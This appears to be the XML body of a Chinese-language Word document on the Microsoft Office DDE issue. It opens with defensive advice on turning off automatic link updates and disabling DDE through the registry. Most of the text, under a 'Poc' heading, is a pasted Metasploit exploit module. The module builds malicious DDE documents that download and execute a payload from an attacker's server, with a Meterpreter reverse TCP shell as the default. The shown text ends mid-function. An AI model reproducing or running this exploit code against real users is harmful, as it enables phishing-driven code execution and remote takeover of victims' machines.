    <w:p w14:paraId="4508FDE9" w14:textId="5E2EDC83" w:rsidR="00913CD6" w:rsidRDefault="00913CD6" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>安全建议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8CB0F8" w14:textId="0A16D3D9" w:rsidR="00913CD6" w:rsidRPr="00913CD6" w:rsidRDefault="00913CD6" w:rsidP="00913CD6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21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913CD6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">由于微软认为这并不是安全问题因此没有发布解决方案，只是说未来会更新运行 DDE 功能时的安全提醒内容。用户而言如果担心安全的话可以自己先禁用，禁用后即使遇到特定文档也不会自动打开 DDE 运行确认对话框。使用的是 Microsoft Office 2016 可以打开 Word </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>—文件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>—选项—高级—常规—取消</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>勾选打开</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时自动更新链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E0086" w14:textId="28C9E408" w:rsidR="00913CD6" w:rsidRDefault="00913CD6" w:rsidP="00913CD6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于 Excel 2016 同样位于文件—选项—高级—常规—</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取消勾选请求</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动更新链接，或者直接修改注册表禁用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DC339" w14:textId="53A54946" w:rsidR="00913CD6" w:rsidRDefault="00913CD6" w:rsidP="00913CD6">
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直接通过注册表禁用DDE数据交换功能</w:t>
      </w:r>
      <w:r w:rsidR="006733E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006733E8">
        <w:t xml:space="preserve">手动修改麻烦的话可以直接使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006733E8">
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006733E8">
        <w:t xml:space="preserve"> 上开发者维护的注册表，可直接禁用掉 Office 系列软件的 DDE 功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B74BC" w14:textId="2F6A196E" w:rsidR="006733E8" w:rsidRDefault="006733E8" w:rsidP="00913CD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="145E4F3B" w14:textId="2A350CA0" w:rsidR="006733E8" w:rsidRPr="006733E8" w:rsidRDefault="004F2C3C" w:rsidP="00913CD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  <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006733E8" w:rsidRPr="006733E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="006733E8" w:rsidRPr="006733E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>oc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006733E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0B48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##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B47F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# This module requires Metasploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00A54903">
          <w:rPr>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://metasploit.com/download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E15625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# Current source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00A54903">
          <w:rPr>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://github.com/rapid7/metasploit-framework</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45699A1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##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A1888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589C1CF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class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MetasploitModule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::Exploit::Remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7810A18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Rank = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ManualRanking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3111717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0539B4E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include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit::Remote::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HttpServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11DE9668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include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit::FILEFORMAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233CD10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include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F2AAFD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include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit::EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A87F7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022F6A5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def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>initialize(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>info  = {})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700EC76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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>super(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>update_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(info,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020548D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‘Name’ =&gt; ‘Microsoft Office DDE Payload Delivery’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC818F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‘Description’ =&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>q{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A73037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This module generates an DDE command to place within</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0959CCF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a word document, that when executed, will retrieve a HTA payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551A0C68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  via HTTP from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635ACD5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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84817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‘Author’ =&gt; ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mumbai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67533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‘License’ =&gt; MSF_LICENSE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EFA25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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DisclosureDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’ =&gt; ‘Oct 9 2017′,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934DDF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‘References’ =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C353E0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['URL', '</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00A54903">
          <w:rPr>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A5E5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['URL', '</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00A54903">
          <w:rPr>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A217BA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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192A0C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‘Arch’ =&gt; [ARCH_X86, ARCH_X64],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E884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‘Platform’ =&gt; ‘win’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612DBB3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‘Stance’ =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit::Stance::Aggressive,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32732CA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‘Targets’ =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0783F09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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0702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  ['Microsoft Office', {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>} ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB1F3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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A8BA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultTarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’ =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B6DF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‘Payload’ =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C570D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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DisableNops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’ =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7286F47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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C9B6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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’ =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3483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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DisablePayloadHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’ =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB53DF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‘PAYLOAD’ =&gt; ‘windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331809F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‘EXITFUNC’ =&gt; ‘thread’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4377F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035EF94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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E06D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register_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>options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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA1F9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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OptString.new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"FILENAME", [true, "Filename to save as", "msf.rtf"]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B568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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OptPath.new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“INJECT_PATH”, [false, "Path to file to inject", nil])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D841F9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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC987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5E3187C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2D3213B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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gen_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, *method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B2A8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ignore_cert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PshMethods.ignore_ssl_certificate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="140C194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2F315E6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if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>method.include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>? ‘string’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE769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r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>download_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = datastore['PSH-Proxy'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rex::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PshMethods.download_and_exec_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241795E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lastRenderedPageBreak/>
        <w:t>    else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DDC69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# Random filename to use, if there isn’t anything set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521826E8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random = “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rand_text_alphanumeric</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8}.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039977E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# Set filename (Use random filename if empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3198FEA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filename = datastore['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BinaryEXE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-FILENAME'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].blank</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>? ? random : datastore['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BinaryEXE</w:t>
